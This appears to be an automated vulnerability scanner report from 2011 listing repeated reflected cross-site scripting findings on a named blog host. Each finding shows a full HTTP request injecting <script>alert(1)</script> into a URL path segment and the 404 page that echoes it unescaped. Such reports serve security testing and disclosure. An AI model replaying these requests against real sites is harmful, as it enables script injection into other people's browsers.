GET /pandora/archives/2008465a8<script>alert(1)</script>77d6f7cf9b1/04/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:53 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008465a8<script>alert(1)</script>77d6f7cf9b1/04/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8193f<script>alert(1)</script>fa1c0f6c054 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/048193f<script>alert(1)</script>fa1c0f6c054/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:56 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/048193f<script>alert(1)</script>fa1c0f6c054/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fba06<script>alert(1)</script>415a42b75c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorafba06<script>alert(1)</script>415a42b75c1/archives/2008/05/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:46 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorafba06<script>alert(1)</script>415a42b75c1/archives/2008/05/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 189bf<script>alert(1)</script>7e15ac1b4e2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives189bf<script>alert(1)</script>7e15ac1b4e2/2008/05/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:48 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives189bf<script>alert(1)</script>7e15ac1b4e2/2008/05/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload df6e5<script>alert(1)</script>6172eb86b30 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008df6e5<script>alert(1)</script>6172eb86b30/05/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:51 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008df6e5<script>alert(1)</script>6172eb86b30/05/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 150c1<script>alert(1)</script>9c01c9b532d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/05150c1<script>alert(1)</script>9c01c9b532d/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:54 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/05150c1<script>alert(1)</script>9c01c9b532d/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 15eb9<script>alert(1)</script>7a020e9b0eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora15eb9<script>alert(1)</script>7a020e9b0eb/archives/2008/06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:02 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora15eb9<script>alert(1)</script>7a020e9b0eb/archives/2008/06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ec3a9<script>alert(1)</script>a9054eec92c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesec3a9<script>alert(1)</script>a9054eec92c/2008/06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:07 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesec3a9<script>alert(1)</script>a9054eec92c/2008/06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 46068<script>alert(1)</script>eee473a0b7a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200846068<script>alert(1)</script>eee473a0b7a/06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:10 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200846068<script>alert(1)</script>eee473a0b7a/06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c3962<script>alert(1)</script>2bd69b3ec0b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/06c3962<script>alert(1)</script>2bd69b3ec0b/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:14 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/06c3962<script>alert(1)</script>2bd69b3ec0b/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47138<script>alert(1)</script>a3f13374191 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora47138<script>alert(1)</script>a3f13374191/archives/2008/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:50 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora47138<script>alert(1)</script>a3f13374191/archives/2008/07/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e4152<script>alert(1)</script>d0196897ba0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivese4152<script>alert(1)</script>d0196897ba0/2008/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:55 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivese4152<script>alert(1)</script>d0196897ba0/2008/07/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 12ccb<script>alert(1)</script>30223f2cf54 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200812ccb<script>alert(1)</script>30223f2cf54/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:58 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200812ccb<script>alert(1)</script>30223f2cf54/07/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a9e3c<script>alert(1)</script>20dad2bc554 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/07a9e3c<script>alert(1)</script>20dad2bc554/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:04 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/07a9e3c<script>alert(1)</script>20dad2bc554/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 56d79<script>alert(1)</script>a4032462556 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora56d79<script>alert(1)</script>a4032462556/archives/2008/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:43 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora56d79<script>alert(1)</script>a4032462556/archives/2008/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 25bf5<script>alert(1)</script>3d971d76d88 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives25bf5<script>alert(1)</script>3d971d76d88/2008/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:45 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives25bf5<script>alert(1)</script>3d971d76d88/2008/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5abe6<script>alert(1)</script>db42742e74 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20085abe6<script>alert(1)</script>db42742e74/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:47 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 348 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20085abe6<script>alert(1)</script>db42742e74/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 70934<script>alert(1)</script>e46d04bff1b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/0870934<script>alert(1)</script>e46d04bff1b/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:51 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/0870934<script>alert(1)</script>e46d04bff1b/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ac95c<script>alert(1)</script>f39701078da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraac95c<script>alert(1)</script>f39701078da/archives/2008/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:56 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraac95c<script>alert(1)</script>f39701078da/archives/2008/09/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eb2c5<script>alert(1)</script>2ae1ae68fdb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archiveseb2c5<script>alert(1)</script>2ae1ae68fdb/2008/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:58 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archiveseb2c5<script>alert(1)</script>2ae1ae68fdb/2008/09/ was not found on this server.</p> ...[SNIP]...
